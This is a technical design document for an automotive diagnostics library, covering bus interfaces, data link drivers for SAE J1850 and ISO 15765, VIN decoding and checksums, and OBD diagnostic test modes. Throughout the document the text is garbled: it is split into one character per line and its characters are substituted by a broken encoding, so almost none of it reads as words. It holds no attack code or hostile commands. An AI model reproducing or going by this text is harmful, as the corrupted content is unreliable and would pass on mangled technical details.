T
_
{
•
]
Y
Z
R
j
]
S
T
_
`
Y
Z
t
V
U
Y
}
V
Z
V
^
Y
`
Y
Z
S
È
•
o
Q
V
_
{
Y
j
]
S
T
_
`
Y
Z
t
V
U
Y
}
V
Z
V
^
Y
`
Y
Z
S
È
•
¤
Z
V
_
S
^
T
`
j
]
S
U
e
^
^
V
_
c
S
fS
]
U
Q
V
S
T
_
T
`
T
V
W
T
V
`
T
e
_
e
Z
£
_
V
W
T
V
`
T
e
_
g
È
V
_
c
•
[
Y
`
Z
T
Y
v
Y
Z
Y
S
]
W
`
S
e
t
}
Z
Y
v
T
e
]
S
U
e
^
^
V
_
c
S
O
¤
Q
Y
t
e
W
W
e
r
T
_
{
}
V
Z
V
^
Y
`
Y
Z
S
V
Z
Y
V
v
V
T
W
V
j
W
Y
t
e
Z
Y
V
U
Q
j
]
S
T
_
`
Y
Z
t
V
U
Y
•
~
]
S
`
R
}
Y
f
v
}
r
È
}
r
^
È
T
S
e
È
U
V
_
È
e
Z
V
]
`
e
g
È
•
~
]
S
S
}
Y
Y
c
T
_
j
T
`
S
}
Y
Z
S
Y
U
e
_
c
e
Z
Y
Z
e
t
e
Z
c
Y
t
V
]
W
`
Z
V
`
Y
È
V
_
c
•
k
_
T
`
T
V
W
T
V
`
T
e
_
`
e
}
Y
Z
t
e
Z
^
e
_
S
e
U
s
Y
`
e
}
Y
_
f
_
e
_
Y
È
t
V
S
`
È
S
W
e
r
È
U
V
Z
j
È
e
Z
V
]
`
e
g
O
ÿ
F
ÿ
M
L
K
I
²
L
I
H
³
L
•
`
e
c
e
è
S
e
U
s
e
}
`
S
∗
_
Y
`
r
e
Z
s
}
Z
e
`
e
U
e
W
È
S
}
Y
Y
c
È
T
_
T
`
∗
V
c
c
Z
Y
S
S
è
}
Z
e
^
T
S
U
]
e
]
S
^
e
c
Y
t
e
Z
S
_
T
)
_
{
è
S
]
}
}
e
Z
`
p
¥
'
P
p
o
§
¤
ÿ
F
ÿ°
¬
±
¬
!
L
I
¹
¹
I
³
¯
`
e
c
e
m
~
u
e
v
Y
Z
e
`
Q
Y
Z
S
`
]
ë
È
`
e
e
¦
`
e
c
e
Y
_
U
V
}
S
]
W
V
`
Y
c
}
V
U
s
Y
`
t
e
Z
^
V
`
È
T
_
U
W
]
c
T
_
{
j
]
S
`
R
}
Y
È
k
¥
[
È
_
e
Z
^
V
W
T
V
`
T
e
_
j
T
`
N
¡
í
ø
ò
÷
ø
ñ
ÿ
ÿ
F
%
L
I
²
L
¯
I
!
L
I
p
s
Y
Z
_
Y
W
c
Z
T
v
Y
Z
T
S
Z
Y
\
]
T
Z
Y
c
`
e
}
Y
Z
t
e
Z
^
`
Q
Y
T
_
`
Y
Z
Z
]
}
`
V
_
c
`
T
^
T
_
{
t
]
_
U
`
T
e
_
S
t
e
Z
Y
V
U
Q
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
O
¤
Q
Y
Z
Y
T
S
V
c
T
ë
Y
Z
Y
_
`
s
Y
Z
_
Y
W
c
Z
T
v
Y
Z
t
e
Z
Y
V
U
Q
v
V
Z
T
V
_
`
e
t
`
Q
Y
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
O
ÿ
ÿ
I
!
L
I
H
L
²
J
¤
Q
Y
c
Z
T
v
Y
Z
c
V
Y
^
e
_
}
Z
e
v
T
c
Y
S
V
]
_
T
£
Y
c
T
_
`
Y
Z
t
V
U
Y
`
e
V
W
W
`
Q
Y
v
V
Z
T
e
]
S
Q
V
Z
c
r
V
Z
Y
T
_
`
Y
Z
¢
t
V
U
Y
S
O
¤
Q
Y
c
V
Y
^
e
_
V
W
S
e
}
Z
e
v
T
c
Y
S
S
e
^
Y
j
]
ë
Y
Z
T
_
{
V
_
c
e
`
Q
Y
Z
Q
T
{
Q
Y
Z
W
Y
v
Y
W
t
]
_
U
`
T
e
_
S
O
¥
e
Z
`
Q
Y
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
T
_
`
Y
Z
t
V
U
Y
S
È
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
T
S
c
e
_
Y
T
_
e
`
`
e
c
O
d
]
W
`
T
}
W
Y
V
}
}
W
T
U
V
`
T
e
_
S
^
V
R
U
e
_
_
Y
U
`
`
e
V
S
T
_
{
W
Y
c
Z
T
v
Y
Z
c
V
Y
^
e
_
O
p
S
T
_
{
W
Y
e
`
`
e
c
^
V
R
S
]
}
}
e
Z
`
^
e
Z
Y
`
Q
V
_
e
_
Y
j
]
S
`
Q
Z
e
]
{
Q
e
_
Y
e
Z
^
e
Z
Y
c
Y
v
T
U
Y
S
O
¤
Q
Y
c
Z
T
v
Y
Z
c
V
Y
^
e
_
U
e
^
^
]
¢
_
T
U
V
`
Y
S
r
T
`
Q
}
Q
R
S
T
U
V
W
c
Y
v
T
U
Y
S
`
Q
Z
e
]
{
Q
V
s
Y
Z
_
Y
W
c
Y
v
T
U
Y
c
Z
T
v
Y
Z
È
Y
T
`
Q
Y
Z
V
S
`
V
_
c
V
Z
c
S
Y
Z
T
V
W
c
Y
v
T
U
Y
t
e
Z
Q
V
Z
c
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
e
Z
`
Q
Y
U
]
S
`
e
^
c
Y
v
T
U
Y
c
Z
T
v
Y
Z
t
e
Z
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
O
p
}
}
W
T
U
V
`
T
e
_
S
U
e
^
^
]
_
T
U
V
`
Y
r
T
`
Q
`
Q
Y
c
Z
T
v
Y
Z
c
V
Y
^
e
_
Y
T
`
Q
Y
Z
`
Q
Z
e
]
{
Q
W
e
U
V
W
p
¥
'
·
q
k
*
S
e
U
s
Y
`
S
e
Z
`
Q
Z
e
]
{
Q
V
_
Y
`
r
e
Z
s
T
_
`
Y
Z
t
V
U
Y
e
t
`
R
}
Y
p
¥
'
m
~
u
O
X
e
U
V
W
S
e
U
s
Y
`
U
e
^
^
]
_
T
U
V
`
T
e
_
T
S
S
}
Y
U
T
£
Y
c
T
_
S
Y
U
`
T
e
_
h
O
N
O
h
O
u
V
`
V
T
S
}
V
S
S
Y
c
`
Q
Z
e
]
{
Q
e
_
Y
S
e
U
s
Y
`
}
Y
Z
j
]
S
T
_
`
Y
Z
t
V
U
Y
r
Q
T
W
Y
U
e
_
`
Z
e
W
T
_
t
e
Z
^
V
`
T
e
_
T
S
}
V
S
S
Y
c
`
Q
Z
e
]
{
Q
V
_
e
`
Q
Y
Z
S
e
U
s
Y
`
O
¤
Q
Y
_
Y
`
r
e
Z
s
T
_
`
Y
Z
t
V
U
Y
T
^
}
W
Y
^
Y
_
`
V
`
T
e
_
T
S
S
}
Y
U
T
£
Y
c
T
_
S
Y
U
`
T
e
_
h
O
N
Oa
O
u
V
`
V
T
S
}
V
S
S
Y
c
`
Q
Z
e
]
{
Q
V
S
e
U
s
Y
`
e
t
p
¥
'
m
~
u
`
R
}
Y
È
r
Q
T
W
Y
U
e
_
`
Z
e
W
T
_
t
e
Z
^
V
`
T
e
_
T
S
}
V
S
S
Y
c
v
T
V
{
Y
`
S
e
U
s
e
}
`
f
g
V
_
c
S
Y
`
S
e
U
s
e
}
`
f
g
O
¤
Q
Y
c
Z
T
v
Y
Z
c
V
Y
^
e
_
T
S
U
e
_
£
{
]
Z
Y
c
V
`
Z
]
_
`
T
^
Y
`
e
V
S
S
e
U
T
V
`
Y
j
]
S
T
_
`
Y
Z
t
V
U
Y
S
r
T
`
Q
W
e
U
V
W
S
e
U
s
Y
`
S
e
Z
_
Y
`
r
e
Z
s
T
_
`
Y
Z
t
V
U
Y
S
O
o
e
_
£
{
]
Z
V
`
T
e
_
e
t
`
Q
Y
c
Z
T
v
Y
Z
c
V
Y
^
e
_
T
_
U
W
]
c
Y
S
`
Q
Y
t
e
W
W
e
r
T
_
{
t
e
Z
Y
V
U
Q
j
]
S
T
_
`
Y
Z
t
V
U
Y
•
u
Y
v
T
U
Y
£
W
Y
`
e
}
Q
R
S
T
U
V
W
c
Y
v
T
U
Y
È
•
u
Y
v
T
U
Y
`
R
}
Y
È
•
u
Y
v
T
U
Y
S
}
Y
U
T
£
U
e
}
`
T
e
_
S
È
•
~
]
S
_
]
^
j
Y
Z
r
T
`
Q
T
_
c
Y
v
T
U
Y
È
•
p
W
W
e
r
Y
c
j
]
S
`
R
}
Y
S
È
•
u
Y
t
V
]
W
`
j
]
S
`
R
}
Y
V
_
c
S
}
Y
Y
c
È
V
_
c
•
u
Y
t
V
]
W
`
T
_
T
`
T
V
W
T
V
`
T
e
_
`
R
}
Y
O
í
ö
ò
+
ø
ô
ø
ò
÷
ñ
¤
Q
Y
W
T
j
Z
V
Z
R
t
]
_
U
`
T
e
_
V
W
T
`
R
T
S
^
T
_
T
^
V
W
W
R
S
}
W
T
`
]
}
`
e
V
W
W
e
r
W
e
{
T
U
V
W
{
Z
e
]
}
S
e
t
t
]
_
U
`
T
e
_
S
`
e
j
Y
S
Y
}
V
Z
V
`
Y
c
t
Z
e
^
e
`
Q
Y
Z
S
r
T
`
Q
e
]
`
Q
V
v
T
_
{
V
_
T
_
e
Z
c
T
_
V
`
Y
_
]
^
j
Y
Z
e
t
W
T
j
Z
V
Z
T
Y
S
`
e
s
Y
Y
}
`
Z
V
U
s
e
t
O
¥
]
_
U
`
T
e
_
S
`
Q
V
`
V
Z
Y
S
Q
V
Z
Y
c
j
Y
`
r
Y
Y
_
c
T
ë
Y
Z
Y
_
`
}
W
V
`
t
e
Z
^
S
V
Z
Y
T
_
`
Q
Y
T
Z
N
N
e
r
_
W
T
j
Z
V
Z
R
S
T
_
U
Y
`
Q
Y
R
r
T
W
W
j
Y
j
]
T
W
`
c
T
ë
Y
Z
Y
_
`
W
R
t
Z
e
^
e
`
Q
Y
Z
t
]
_
U
`
T
e
_
S
O
q
e
`
V
j
W
R
È
`
Q
Y
R
r
T
W
W
Z
Y
\
]
T
Z
Y
^
]
U
Q
j
Z
e
V
c
Y
Z
U
Z
e
S
S
¢
U
e
^
}
T
W
V
`
T
e
_
S
]
}
}
e
Z
`
O
¥
]
_
U
`
T
e
_
S
Z
Y
W
V
`
Y
c
`
e
V
S
T
_
{
W
Y
S
`
V
_
c
V
Z
c
È
{
e
v
Y
Z
_
T
_
{
j
e
c
R
È
^
V
_
]
t
V
U
`
]
Z
Y
Z
È
e
Z
{
e
v
Y
Z
_
^
Y
_
`
V
W
^
V
_
c
V
`
Y
È
r
T
W
W
j
Y
{
Z
e
]
}
Y
c
`
e
{
Y
`
Q
Y
Z
T
_
`
Q
Y
T
Z
e
r
_
W
T
j
Z
V
Z
R
O
m
_
W
R
r
Q
Y
Z
Y
V
S
}
Y
U
T
£
U
_
Y
Y
c
V
Z
T
S
Y
S
r
T
W
W
t
]
_
U
`
T
e
_
S
j
Y
S
}
W
T
`
T
_
`
e
W
T
j
Z
V
Z
T
Y
S
t
]
Z
`
Q
Y
Z
`
Q
V
_
`
Q
T
S
O
ÿ
M
ÿ
F
H
H
$
²
L
³
J
L
¯
J
,
¯
²
¤
Q
Y
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
W
T
j
Z
V
Z
R
U
e
_
`
V
T
_
S
t
]
_
U
`
T
e
_
V
W
T
`
R
_
Y
U
Y
S
S
V
Z
R
`
e
c
Y
U
e
c
Y
`
Q
Y
c
V
`
V
W
T
_
s
W
V
R
Y
Z
e
_
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
O
u
V
`
V
W
T
_
s
W
V
R
Y
Z
T
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
N
|
w
¡
t
e
Z
i
P
b
V
_
c
P
b
d
V
_
c
k
l
m
N
n
h
a
¡
¢
N
t
e
Z
k
l
m
O
l
e
^
Y
c
Y
v
T
U
Y
S
^
V
R
e
_
W
R
S
]
}
}
e
Z
`
V
S
]
j
S
Y
`
e
t
`
Q
Y
c
V
`
V
W
T
_
s
W
V
R
Y
Z
S
T
t
`
Q
Y
R
U
V
_
_
e
`
^
Y
Y
`
`
Q
Y
`
T
^
T
_
{
Z
Y
\
]
T
Z
Y
^
Y
_
`
S
_
Y
U
Y
S
S
V
Z
R
t
e
Z
`
Q
Y
t
V
S
`
Y
Z
j
]
S
`
R
}
Y
S
O
¤
Q
Y
W
T
j
Z
V
Z
R
U
V
_
j
Y
U
e
_
£
{
]
Z
Y
c
V
`
U
e
^
}
T
W
Y
`
T
^
Y
V
S
r
Y
W
W
V
S
Z
]
_
`
T
^
Y
`
e
e
^
T
`
`
Q
Y
]
_
S
]
}
}
e
Z
`
Y
c
j
]
S
`
R
}
Y
S
O
o
e
^
}
T
W
Y
`
T
^
Y
U
e
_
£
{
]
Z
V
`
T
e
_
T
S
}
V
Z
`
T
U
]
W
V
Z
W
R
_
Y
U
Y
S
S
V
Z
R
`
e
Z
Y
c
]
U
Y
U
e
c
Y
S
T
Y
t
e
Z
Q
V
Z
c
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
O
¤
Q
Y
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
Z
e
]
`
T
_
Y
S
V
Z
Y
S
Q
V
Z
Y
c
È
r
Q
Y
Z
Y
}
e
S
S
T
j
W
Y
È
j
Y
`
r
Y
Y
_
V
W
W
S
e
t
`
r
V
Z
Y
V
_
c
Q
V
Z
c
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
}
W
V
`
t
e
Z
^
S
O
¤
Q
Y
S
Y
}
W
V
`
t
e
Z
^
S
T
_
U
W
]
c
Y
`
Q
Y
Q
e
S
`
U
e
^
}
]
`
Y
Z
È
`
Q
Y
c
Y
v
Y
W
e
}
^
Y
_
`
j
e
V
Z
c
È
{
Y
_
Y
Z
V
W
}
]
Z
}
e
S
Y
^
T
U
Z
e
U
e
_
`
Z
e
W
W
Y
Z
S
È
V
_
c
`
Q
Y
·
l
~
S
Y
Z
T
V
W
V
c
V
}
`
Y
Z
O
o
e
_
S
`
V
_
`
S
V
Z
Y
}
Z
e
v
T
c
Y
c
`
e
S
}
Y
U
T
t
R
V
W
W
`
Q
Y
Z
Y
W
Y
v
V
_
`
}
]
W
S
Y
S
t
e
Z
Y
V
U
Q
j
]
S
O
¤
Q
Y
W
T
j
Z
V
Z
R
}
Z
e
v
T
c
Y
S
`
Q
Y
t
e
W
W
e
r
T
_
{
t
]
_
U
`
T
e
_
S
-
J
H
H
¯
²
J
L
³
J
L
u
Y
U
e
c
Y
V
S
Y
Z
T
Y
S
e
t
}
]
W
S
Y
S
T
_
`
e
c
V
`
V
j
R
`
Y
S
O
-
J
H
H
¯
²
L
²
³
J
L
§
_
U
e
c
Y
c
V
`
V
j
R
`
Y
S
T
_
`
e
V
S
Y
Z
T
Y
S
e
t
}
]
W
S
Y
S
O
ÿ
M
ÿ
L
³
¯
L
J
L
²
&
³
H
²
´
L
I
¯
!
²
¤
Q
Y
v
Y
Q
T
U
W
Y
T
c
Y
_
`
T
£
U
V
`
T
e
_
_
]
^
j
Y
Z
fi
k
q
g
W
T
j
Z
V
Z
R
U
e
_
`
V
T
_
S
Z
e
]
`
T
_
Y
S
`
e
c
Y
U
e
c
Y
`
Q
Y
i
k
q
e
t
V
v
Y
Q
T
U
W
Y
O
¥
e
Z
v
Y
Q
T
U
W
Y
S
^
V
_
]
t
V
U
`
]
Z
Y
c
V
t
`
Y
Z
N
|
¡
È
`
Q
Y
t
e
Z
^
V
`
e
t
`
Q
Y
i
k
q
T
S
S
}
Y
U
T
£
Y
c
T
_
k
l
m
a
y
y
È
k
l
m
a
y
|
¡
O
¥
Z
e
^
`
Q
Y
i
k
q
T
`
T
S
}
e
S
S
T
j
W
Y
`
e
c
Y
`
Y
Z
^
T
_
Y
S
}
Y
U
T
£
U
V
`
T
e
_
S
e
t
V
v
Y
Q
T
U
W
Y
T
_
U
W
]
c
T
_
{
^
V
s
Y
f^
V
_
]
t
V
U
`
]
Z
Y
Z
g
È
^
e
c
Y
W
È
^
e
c
Y
W
R
Y
V
Z
È
`
Z
T
^
W
Y
v
Y
W
È
U
e
]
_
`
Z
R
e
t
e
Z
T
{
T
_
È
V
_
c
e
`
Q
Y
Z
v
Y
Q
T
U
W
Y
T
_
t
e
Z
^
V
`
T
e
_
O
¤
Q
Y
W
T
j
Z
V
Z
R
V
W
S
e
U
e
_
`
V
T
_
S
V
Z
e
]
`
T
_
Y
`
e
v
Y
Z
T
t
R
`
Q
Y
i
k
q
U
Q
Y
U
s
S
]
^
O
l
e
^
Y
T
_
t
e
Z
^
V
`
T
e
_
^
V
R
_
e
`
j
Y
V
v
V
T
W
V
j
W
Y
t
e
Z
V
W
W
v
Y
Q
T
U
W
Y
S
È
c
Y
}
Y
_
c
T
_
{
e
_
^
V
_
R
t
V
U
`
e
Z
S
T
_
U
W
]
c
T
_
{
`
Q
Y
r
T
W
W
T
_
{
_
Y
S
S
e
t
`
Q
Y
^
V
_
]
t
V
U
`
]
Z
Y
Z
`
e
}
Z
e
v
T
c
Y
S
]
U
Q
T
_
t
e
Z
^
V
`
T
e
_
`
e
`
Q
Y
}
]
j
W
T
U
O
§
V
U
Q
Y
_
`
Z
R
T
S
S
}
Y
U
T
£
Y
c
V
S
V
s
Y
R
©
v
V
W
]
Y
}
V
T
Z
`
Q
Y
s
Y
R
T
S
V
}
V
`
`
Y
Z
_
^
V
`
U
Q
Y
¨
}
Z
Y
S
S
T
e
_
e
_
`
Q
Y
i
k
q
V
_
c
`
Q
Y
v
V
W
]
Y
T
S
V
c
Y
S
U
Z
T
}
`
T
e
_
e
t
S
e
^
Y
}
Z
e
}
Y
Z
`
R
e
t
`
Q
Y
v
Y
Q
T
U
W
Y
O
d
]
W
`
T
}
W
Y
^
V
`
U
Q
Y
S
V
Z
Y
V
W
W
e
r
Y
c
`
e
}
Z
Y
v
Y
_
`
Z
Y
c
]
_
c
V
_
U
R
T
_
`
Q
Y
c
V
`
V
j
V
S
Y
O
¤
Q
Y
W
T
j
Z
V
Z
R
r
T
W
W
c
Y
£
_
Y
`
Q
Y
c
V
`
V
`
R
}
Y
V
S
S
}
Y
U
T
£
Y
c
T
_
`
V
j
W
Y
N
N
t
e
Z
Z
Y
}
Z
Y
S
Y
_
`
T
_
{
V
c
Y
U
e
c
Y
c
i
k
q
O
¤
Q
Y
W
T
j
Z
V
Z
R
}
Z
e
v
T
c
Y
S
`
Q
Y
t
e
W
W
e
r
T
_
{
t
]
_
U
`
T
e
_
S
-
!
²
³
L
³
´
o
V
W
U
]
W
V
`
Y
`
Q
Y
U
Q
Y
U
s
S
]
^
t
e
Z
V
i
k
q
O
¤
Q
T
S
v
V
W
]
Y
^
V
R
j
Y
U
e
^
}
V
Z
Y
c
`
e
`
Q
Y
V
}
}
Z
e
}
Z
T
V
`
Y
}
e
S
T
`
T
e
_
`
e
v
Y
Z
T
t
R
V
U
Q
Y
U
s
S
]
^
e
Z
V
S
S
T
{
_
Y
c
`
e
`
Q
V
`
}
e
S
T
`
T
e
_
`
e
U
Z
Y
V
`
Y
V
v
V
W
T
c
i
k
q
O
-
!
²
¯
´
µ
X
e
e
s
]
}
`
Q
Y
S
}
Y
U
T
£
Y
c
i
k
q
T
_
N
h
^
Y
^
j
Y
Z
_
V
^
Y
c
Y
S
U
Z
T
}
`
T
e
_
U
e
]
_
`
Z
R
o
e
]
_
`
Z
R
e
t
^
V
_
]
t
V
U
`
]
Z
Y
O
^
V
_
]
t
V
U
`
]
Z
Y
Z
d
V
_
]
t
V
U
`
]
Z
Y
Z
_
V
^
Y
fY
O
{
O
È
¥
e
Z
c
g
O
^
V
s
Y
d
V
s
Y
e
Z
c
T
v
T
S
T
e
_
f
Y
O
{
O
È
X
V
_
c
[
e
v
Y
Z
g
O
^
e
c
Y
W
d
e
c
Y
W
_
V
^
Y
fY
O
{
O
È
u
T
S
U
e
v
Y
Z
R
g
O
S
Y
Z
T
Y
S
l
Y
Z
T
Y
S
e
Z
^
e
c
Y
W
v
V
Z
T
V
_
`
fY
O
{
O
È
l
§
g
O
j
e
c
R
~
e
c
R
`
R
}
Y
f
_
]
^
j
Y
Z
e
t
c
e
e
Z
S
È
Y
`
U
O
g
O
Y
_
{
T
_
Y
§
_
{
T
_
Y
S
T
Y
V
_
c
t
]
Y
W
`
R
}
Y
O
`
Z
V
_
S
^
T
S
S
T
e
_
¤
Z
V
_
S
^
T
S
S
T
e
_
È
r
Y
T
{
Q
`
U
W
V
S
S
O
r
Y
T
{
Q
`
x
Z
e
S
S
v
Y
Q
T
U
W
Y
r
Y
T
{
Q
`
Z
V
`
T
_
{
f
x
i
b
[
g
O
Y
^
T
S
S
T
e
_
§
^
T
S
S
T
e
_
S
R
S
`
Y
^
e
Z
Z
V
`
T
_
{
O
Z
Y
S
`
Z
V
T
_
`
[
Y
S
`
Z
V
T
_
`
S
R
S
`
Y
^
O
R
Y
V
Z
d
e
c
Y
W
R
Y
V
Z
O
}
W
V
_
`
p
S
S
Y
^
j
W
R
}
W
V
_
`
O
S
Y
Z
T
V
W
d
V
_
]
t
V
U
`
]
Z
Y
S
Y
\
]
Y
_
U
Y
_
]
^
j
Y
Z
O
¤
V
j
W
Y
N
N
u
Y
U
e
c
Y
c
i
k
q
u
V
`
V
¤
R
}
Y
ÿ
M
ÿ
M
H
²
³
.
L
®
J
L
¯
J
¤
Q
Y
m
~
u
h
W
T
j
Z
V
Z
R
T
^
}
W
Y
^
Y
_
`
S
`
Q
Y
^
V
Æ
e
Z
T
`
R
e
t
`
Q
Y
l
p
§
m
~
u
h
S
}
Y
U
T
£
U
V
`
T
e
_
O
l
]
}
}
e
Z
`
t
e
Z
Y
V
U
Q
{
Z
e
]
}
e
t
t
]
_
U
`
T
e
_
V
W
T
`
R
T
S
c
Y
S
U
Z
T
j
Y
c
j
Y
W
e
r
O
l
Y
Y
`
Q
Y
Z
Y
t
Y
Z
Y
_
U
Y
c
S
}
Y
U
T
£
U
V
`
T
e
_
S
t
e
Z
^
e
Z
Y
c
Y
`
V
T
W
Y
c
T
_
t
e
Z
^
V
`
T
e
_
V
j
e
]
`
`
Q
Y
t
Y
V
`
]
Z
Y
S
O
¥
e
Z
U
Y
Z
`
V
T
_
c
V
`
V
È
S
]
U
Q
V
S
u
¤
o
`
V
j
W
Y
S
V
_
c
}
Q
R
S
T
U
V
W
V
c
c
Z
Y
S
S
Y
S
È
`
Q
Y
W
T
j
Z
V
Z
R
U
e
_
¢
`
V
T
_
S
l
p
§
S
}
Y
U
T
£
Y
c
c
V
`
V
V
S
r
Y
W
W
V
S
^
V
_
]
t
V
U
`
]
Z
Y
Z
S
}
Y
U
T
£
Y
c
c
V
`
V
O
d
V
_
]
t
V
U
`
]
Z
Y
Z
c
V
`
V
V
}
}
W
T
U
V
j
T
W
T
`
R
T
S
c
Y
`
Y
Z
^
T
_
Y
c
j
V
S
Y
c
e
_
i
k
q
}
V
`
`
Y
Z
_
^
V
`
U
Q
T
_
{
O
L
K
I
¯
H
/
L
I
µ
L
I
H
²
l
]
}
}
e
Z
`
t
e
Z
`
Q
Y
_
Y
`
r
e
Z
s
W
V
R
Y
Z
}
V
U
s
Y
`
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
N
|
w
¡
O
p
c
V
`
V
S
`
Z
]
U
`
]
Z
Y
S
T
S
c
Y
£
_
Y
c
`
e
t
V
U
T
W
T
`
V
`
Y
t
e
Z
^
V
`
`
T
_
{
e
t
c
V
`
V
T
_
`
e
_
Y
`
r
e
Z
s
}
V
U
s
Y
`
S
t
e
Z
Z
Y
\
]
Y
S
`
S
V
_
c
c
Y
U
e
c
T
_
{
c
V
`
V
t
Z
e
^
Z
Y
}
W
T
Y
S
O
¤
Q
Y
c
V
`
V
S
`
Z
]
U
`
]
Z
Y
U
e
_
`
V
T
_
S
`
Q
Y
Y
_
`
T
Z
Y
}
V
U
s
Y
`
È
T
_
U
W
]
c
T
_
{
Q
Y
V
c
Y
Z
V
_
c
U
Q
Y
U
s
S
]
^
O
¤
Q
Y
_
Y
`
r
e
Z
s
W
V
R
Y
Z
S
]
}
}
e
Z
`
r
T
W
W
}
Z
e
v
T
c
Y
`
Q
Y
t
e
W
W
e
r
T
_
{
t
]
_
U
`
T
e
_
S
-
L
²
J
b
Z
T
`
Y
V
c
V
`
V
}
V
U
s
Y
`
e
_
`
Q
Y
S
}
Y
U
T
£
Y
c
j
]
S
O
-
I
L
³
!
[
Y
V
c
V
c
V
`
V
}
V
U
s
Y
`
t
Z
e
^
`
Q
Y
S
}
Y
U
T
£
Y
c
j
]
S
O
-
³
´
o
e
^
}
]
`
Y
`
Q
Y
U
Q
Y
U
s
S
]
^
e
t
V
}
V
U
s
Y
`
O
H
²
³
L
J
L
l
]
}
}
e
Z
`
t
e
Z
`
Q
Y
c
T
V
{
_
e
S
`
T
U
`
Y
S
`
^
e
c
Y
S
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
N
y
O
u
T
V
{
_
e
S
`
T
U
`
Y
S
`
^
e
c
Y
S
S
]
}
}
e
Z
`
Y
c
V
Z
Y
V
S
t
e
W
W
e
r
S
•
d
e
c
Y
¡
¨
¡
N
[
Y
\
]
Y
S
`
U
]
Z
Z
Y
_
`
}
e
r
Y
Z
`
Z
V
T
_
c
T
V
{
_
e
S
`
T
U
c
V
`
V
È
•
d
e
c
Y
¡
¨
¡
h
[
Y
\
]
Y
S
`
}
e
r
Y
Z
`
Z
V
T
_
t
Z
Y
Y
Y
t
Z
V
^
Y
c
V
`
V
È
•
d
e
c
Y
¡
¨
¡
a
[
Y
\
]
Y
S
`
Y
^
T
S
S
T
e
_
¢
Z
Y
W
V
`
Y
c
}
e
r
Y
Z
`
Z
V
T
_
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
È
N
a
•
d
e
c
Y
¡
¨
¡
n
o
W
Y
V
Z
©
Z
Y
S
Y
`
Y
^
T
S
S
T
e
_
¢
Z
Y
W
V
`
Y
c
c
T
V
{
_
e
S
`
T
U
T
_
t
e
Z
^
V
`
T
e
_
È
•
d
e
c
Y
¡
¨
¡
w
[
Y
\
]
Y
S
`
e
¨
R
{
Y
_
S
Y
_
S
e
Z
^
e
_
T
`
e
Z
T
_
{
`
Y
S
`
Z
Y
S
]
W
`
S
È
•
d
e
c
Y
¡
¨
¡
ª
[
Y
\
]
Y
S
`
e
_
¢
j
e
V
Z
c
^
e
_
T
`
e
Z
T
_
{
`
Y
S
`
Z
Y
S
]
W
`
S
t
e
Z
_
e
_
¢
U
e
_
`
T
_
]
e
]
S
W
R
^
e
_
T
`
e
Z
Y
c
S
R
S
`
Y
^
S
È
•
d
e
c
Y
¡
¨
¡
y
[
Y
\
]
Y
S
`
e
_
¢
j
e
V
Z
c
^
e
_
T
`
e
Z
T
_
{
`
Y
S
`
Z
Y
S
]
W
`
S
t
e
Z
U
e
_
`
T
_
]
e
]
S
W
R
^
e
_
T
`
e
Z
Y
c
S
R
S
`
Y
^
S
È
•
d
e
c
Y
¡
¨
¡
|
[
Y
\
]
Y
S
`
U
e
_
`
Z
e
W
e
t
e
_
¢
j
e
V
Z
c
S
R
S
`
Y
^
È
`
Y
S
`
È
e
Z
U
e
^
}
e
_
Y
_
`
È
V
_
c
•
d
e
c
Y
¡
¨
¡
[
Y
\
]
Y
S
`
v
Y
Q
T
U
W
Y
T
_
t
e
Z
^
V
`
T
e
_
O
¥
e
Z
Y
V
U
Q
`
Y
S
`
^
e
c
Y
È
c
V
`
V
S
`
Z
]
U
`
]
Z
Y
S
V
Z
Y
c
Y
£
_
Y
c
`
e
t
V
U
T
W
T
`
V
`
Y
t
e
Z
^
V
`
`
T
_
{
e
t
c
V
`
V
T
_
`
e
_
Y
`
r
e
Z
s
}
V
U
s
Y
`
S
t
e
Z
Z
Y
\
]
Y
S
`
S
V
_
c
c
Y
U
e
c
T
_
{
c
V
`
V
t
Z
e
^
Z
Y
}
W
T
Y
S
O
u
V
`
V
S
`
Z
]
U
¢
`
]
Z
Y
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
j
V
S
Y
c
e
_
`
Q
Y
t
e
Z
^
V
`
S
c
Y
£
_
Y
c
T
_
l
p
§
N
y
O
p
W
W
^
e
c
Y
S
S
Q
V
W
W
Q
V
v
Y
V
Z
Y
\
]
Y
S
`
t
e
Z
^
V
`
V
_
c
V
Z
Y
}
W
R
t
e
Z
^
V
`
c
Y
£
_
Y
c
O
d
e
c
Y
S
¡
¨
¡
N
È
¡
¨
¡
h
È
¡
¨
¡
w
È
V
_
c
¡
¨
¡
ª
Q
V
v
Y
V
V
c
c
T
`
T
e
_
V
W
Z
Y
}
W
R
t
e
Z
^
V
`
c
Y
£
_
Y
c
t
e
Z
^
Y
S
S
V
{
Y
S
`
Q
V
`
Z
Y
\
]
Y
S
`
`
Q
Y
^
e
c
Y
t
]
_
U
`
T
e
_
S
fP
k
u
S
È
`
Y
S
`
k
u
S
g
S
]
}
}
e
Z
`
Y
c
O
¤
V
j
W
Y
S
e
t
U
e
_
S
`
V
_
`
S
r
T
W
W
j
Y
V
W
S
e
j
Y
c
Y
£
_
Y
c
j
V
S
Y
c
e
_
l
p
§
N
y
O
¤
Q
Y
t
e
W
¢
W
e
r
T
_
{
`
V
j
W
Y
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
•
P
k
u
S
t
e
Z
^
e
c
Y
S
¡
¨
¡
N
V
_
c
¡
¨
¡
h
È
•
j
T
`
^
V
}
}
Y
c
c
V
`
V
t
e
Z
P
k
u
S
¡
¨
¡
N
È
